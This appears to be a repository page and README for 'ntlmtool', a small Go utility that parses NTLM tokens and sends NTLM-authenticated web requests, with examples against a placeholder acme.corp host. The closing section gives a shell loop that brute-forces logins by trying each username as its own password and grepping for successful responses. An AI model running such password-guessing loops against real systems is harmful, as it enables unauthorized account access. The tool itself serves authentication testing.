Simple tool for testing NTLMSSP web authorizations

José González Krause 58b55df73d Actualizar 'README.md' 11 months ago
.gitignore 7333c537e7 Initial commit 11 months ago
LICENSE 7333c537e7 Initial commit 11 months ago
README.md 58b55df73d Actualizar 'README.md' 11 months ago
ntlmtool.go 0db3cfeaf0 Added 'ntlmtool.go' file 11 months ago

README.md

ntlmtool

Simple tool for testing NTLMSSP web authorizations

Install

go get dev.hackercat.ninja/hcninja/ntlmtool
go install dev.hackercat.ninja/hcninja/ntlmtool

Simple usage

# ntlmtool -h

Usage of ntlmtool:
  -body
    	Prints the response body
  -header
    	Prints the response header
  -parse
    	Parse an NTLM token
  -req string
    	Req string (url|domain|user|pass)
  -version int
    	NTLM version [1|2] (default 2)

Check a NTLM token

# echo TlRMTVN…AAAAA | ntlmtool -parse

DomainName: acme
Workstation: WORKSTATION
Username: roadrunner
NtChallengeResponseFields: ?E{BnEbQ~Y_k7ADROOTVM-IISAACMEADRoot.Local4VM-IISAACME.ADRoot.LocalADRoot.Local'9_`

Do a request

# ntlmtool -req "https://private.acme.corp/|acme|roadrunner|[email protected]"

2018/06/27 09:05:17 [https://private.acme.corp/ acme roadrunner [email protected] 200 Ok]

Bruteforce a login

for user in `cat users.txt`; do echo $user; ntlmtool -req "https://private.acme.corp/|acme|$user|$user" >> passBrute.txt; done

And in othe terminal you can watch the progress

watch -n1 grep 200 passBrute*